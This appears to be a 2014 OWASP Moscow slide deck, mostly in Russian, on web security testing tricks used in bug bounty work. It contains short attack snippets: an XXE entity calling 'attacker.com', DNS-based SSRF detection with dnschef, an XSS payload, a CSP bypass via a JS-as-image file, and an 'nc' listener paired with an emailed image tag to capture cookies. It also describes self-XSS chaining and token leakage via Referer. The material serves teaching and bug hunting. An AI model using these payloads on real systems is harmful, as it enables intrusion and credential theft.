Web app sec tricks

1. Трюки при анализе защищенности веб-приложений - продвинутая версия
Сергей Белов
Digital Security
OWASP Moscow, 6 Dec 2014

2. Work/Activity
BugHuting
Speaker
Hey
2

3. XXE/SSRF detection via DNS

4. XXE/SSRF detection via DNS
SSRF:
1) Предложить сайт
<ссылка на сайт>
2) Бот проверяет сайт
3) Вместо внешнего сайта подставляется локальный адрес / заменяется схема (file:///)

5. XXE/SSRF detection via DNS
XXE:
1) XML
<?xml version="1.0" encoding="ISO-8859-1"?>
2) С сущностью
<!ENTITY xxe SYSTEM «http://attacker.com» >]>
3) Парсер пытается подгрузить сущность с внешнего сайта

6. XXE/SSRF detection via DNS
Сложности при поиске:
1) Есть или нет?
2) Время запроса
3) Firewall
4) Другие ограничения

7. XXE/SSRF detection via DNS
DNS leak
DNS server

8. XXE/SSRF detection via DNS
В ссылке есть домен
->
должен быть resolve домена

9. XXE/SSRF detection via DNS
Инструкция
1) Свой сервер (VPS) – 12.34.56.78
1)Ставим attacker.com свои NS сервера
NS1: 12.34.56.78; NS2: 12.34.56.78
2) dnschef
3) python dnschef.py -i 0.0.0.0

10. XXE/SSRF detection via DNS
Реальный пример
Говорят – переходит по ссылкам в чате...

11. XXE/SSRF detection via DNS
Сценарий 1
1) User 1 -> User 2 http://skype-example.com
2) # cat access.log | grep “skype-example” | wc –l
3) 0 

12. XXE/SSRF detection via DNS
Сценарий 2 – DNS
Поймали :]

13. CSP bypass – js as image

14. CSP bypass – js as image

15. CSP bypass – js as image
Картинка == js файл
Gif injector - http://pastebin.com/6yUbfGX5

16. CSP bypass – js as image
1)Возможность загружать файлы на разрешенные домены в CSP
2)Загрузить картинку<->js и сделать инклуд
<script src=“.../image.gif”></script>
Свежие хромы научились блочить подобное 

17. CloudFlare – real IP detection

18. CloudFlare – real IP detection

19. CloudFlare – real IP detection

20. CloudFlare – real IP detection
CloudFlare Free, Pro and Business plan:
We do not proxy wildcard records
CloudFlare Enterprise:
For CloudFlare Enterprise customers, we do proxy wildcard records

21. CloudFlare – real IP detection
ping randoOm.victim.com => REAL IP

22. XSS && urlencode

23. XSS & urlencode
Web Server
?xss=<script>alert(1)</script>

24. XSS & urlencode
1)Не все web серверы выполняют urldecode
2) XSS подставляется, но после urlencode
3)XSS не выполняется 
4)На помощь приходит... IE!

25. XSS & urlencode
Только после знака вопроса

26. XSS & urlencode
А если...
http://domain.com/path/<xss_here>/etc/

27. XSS & urlencode
http://domain.com/path/<xss>/etc/
IE Only (v11 inc):
header("Location: http://domain.com/path/<xss>/etc/");

28. XSS & urlencode

29. SQLmap

30. SQLmap

31. SQLmap
-u http://vuln.com/vote.php
--data="id=1&hash=2“
--eval="import hashlib;hash=hashlib.md5(‘123$id456').hexdigest()"

32. Сложных ситуации - bugbounty

33. Situation #1 – Same Site Scripting
XXXYYYZZZ.target.com => 127.0.0.1
What’s wrong?

34. Situation #1 – Same Site Scripting

35. Situation #1 – Same Site Scripting
External IP – 12.34.56.78
Loopback – 127.0.0.1

36. Situation #1 – Same Site Scripting
Attacker:
1)nc –lv 10024
2)email to victim@corp.xxx with <img src = http://xxyyzz.target.com:10024 > Victim:
1)Open email and...
2)Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)

37. Situation #1 – Same Site Scripting
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml

38. Situation #1 – Same Site Scripting
38
XXXYYYZZZ.target.com => 10.0.0.22
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html

39. Situation #1 – Same Site Scripting
39
https://hackerone.com/reports/1509 - $100

40. Situation #2 – Self XSS

41. Situation #2 – Self XSS
XSS only for you – no impact?

42. Situation #2 – Self XSS

43. Situation #2 – Self XSS
Requirements:
1)CSRF for logout O_o
2)CSRF for login o_O

44. Situation #2 – Self XSS
Steps:
1) Save (self)XSS for you
2) Logout victim
3) Login victim w/ your creds
4) Draw window
5) Catch user’s creds!

45. Situation #2 – Self XSS
Google and self-XSS

46. Situation #2 – Self XSS
Share account and attack your victim

47. Situation #3 – evil HTTP referers

48. Situation #3 - HTTP referer
<a href=“http://external.com”>Go!</a>
In request headers:
...
Referer: http://yoursite.com/
...
But what about external resources on web page such as images, styles...?

49. Situation #3 - HTTP referer
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics-are-awesome.com/howto-choose- password.jpg>
...
Owner of
comics-are-awesome.com
know all _SECRET_ tokens (from referer)!

50. Situation #3 - HTTP referer
https://hackerone.com/reports/738 - $100

51. Situation #5 - Content-Security-Policy

52. Situation #5 - Content-Security-Policy

53. Situation #5 - Content-Security-Policy
CSP only for some browsers!
Is it ok?

54. Situation #5 - Content-Security-Policy
1)Forks with diff UA
2)Proxy cache
3)Load balancer... Bug hunter got $100, but...

55. Situation #5 - Content-Security-Policy
Fail! Why:
•‘Partial support in Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header.
•Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages.
•Chrome for iOS fails to render pages without a connect-src 'self' policy.
•Old FF problems (some versions between XX and YY)

56. Situation #6 - Usernames

57. Situation #6 - Usernames
http://website.com/username

58. Situation #6 - Usernames
Okay! Let’s register:
http://website.com/robots.txt
http://website.com/sitemap.xml
...

59. Situations XXX

60. Situations XXX
•Info disclose via CSS files (full path disclosure while compilation - file:///applications/hackerone/releases/20140221175929/app/assets/stylesheets/application/browser-not- supported.scss (bug #2221)
•SPF and same records
•Short tokens
•Pixel flood attack
•CSRF for login/logout!? (hi Michal Zalewski!)
•... - https://hackerone.com/security?show_all=true

61. Thanks! Questions?
@sergeybelove